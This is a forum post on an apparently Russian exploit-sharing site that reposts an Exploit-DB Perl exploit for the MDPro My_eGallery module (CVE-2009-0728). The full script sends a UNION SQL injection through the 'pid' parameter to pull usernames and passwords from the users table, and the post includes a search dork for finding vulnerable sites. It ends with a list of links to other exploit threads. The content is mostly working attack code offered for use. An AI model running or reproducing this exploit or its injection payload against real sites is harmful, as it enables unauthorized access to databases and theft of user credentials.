Exploit MDPro Module My_eGallery - 'pid' SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8100
Проверка EDB
  1. Пройдено
Автор
STAKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-0728
Дата публикации
2009-02-23
Код: 
#!/usr/bin/perl

<<read;

    MDPro Module My_eGallery Remote SQL Injection Exploit
    by s3rg3770 && yeat - staker[at]hotmail[dot]it
    
    dork: inurl:module=My_eGallery pid
    note: works regardless of php.ini settings.
    
read

use IO::Socket;


my ($host,$path,$id) = @ARGV;


if (@ARGV != 3) 
{
       print "\n+-------------------------------------------------------+\n".
             "\r| MDPro Module My_eGallery Remote SQL Injection Exploit |\n".
             "\r+-------------------------------------------------------+\n".
             "\rby yeat - staker[at]hotmail[dot]it\n".
             "\nUsage: perl $0 host /path/ id\n".
             "\nhost: localhost\n".
             "\rpath: /mdpro/\n".
             "\rid: 2\n";
       exit;
}         
else
{      
       my ($packet,$inject,$content);
       
       $inject = "index.php?module=My_eGallery&do=showpic&pid=-1".
                 "/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0".
                 ",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7".
                 "230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0".
                 ",0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*"; 
                 
       $socket = new IO::Socket::INET(
                                       PeerAddr => $host,
                                       PeerPort => 80,
                                       Proto    => 'tcp'
                                     ) or die $!;
                                        
       
       $packet .= "GET /$inject HTTP/1.1\r\n";
       $packet .= "Host: $host\r\n";
       $packet .= "User-Agent: Lynx (textmode)\r\n";
       $packet .= "Connection: close\r\n\r\n";
       
       $socket->send($packet);
       
       while (<$socket>) {
          $content .= $_;
       }
       
       close($socket);
       
       if ($content =~ /<r0x>(.+?)<r0x>/i) {
          print "Exploit Successful: $1\n";
       }
       else {
          print "Exploit Failed.\n";
       }      
}       

# milw0rm.com [2009-02-23]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit MDPro Module CWGuestBook 2.1 - SQL Injection
Ответы
0
Просмотры
264
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MDPro 1.0.76 - 'index.php' SQL Injection
Ответы
0
Просмотры
331
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MDPro 1.0.76 - 'Cookie PNSVlang' Local File Inclusion
Ответы
0
Просмотры
249
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)
Ответы
0
Просмотры
764
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)
Ответы
0
Просмотры
745
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MyBB smilie Module < 1.8.11 - 'pathfolder' Directory Traversal
Ответы
0
Просмотры
667
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit
Ответы
0
Просмотры
684
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)
Ответы
0
Просмотры
693
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Color Management Module 'icm32.dll' - 'icm32!Fill_ushort_ELUTs_from_lut16Tag' Out-of-Bounds Read (MS17-013)
Ответы
0
Просмотры
611
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload
Ответы
0
Просмотры
799
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу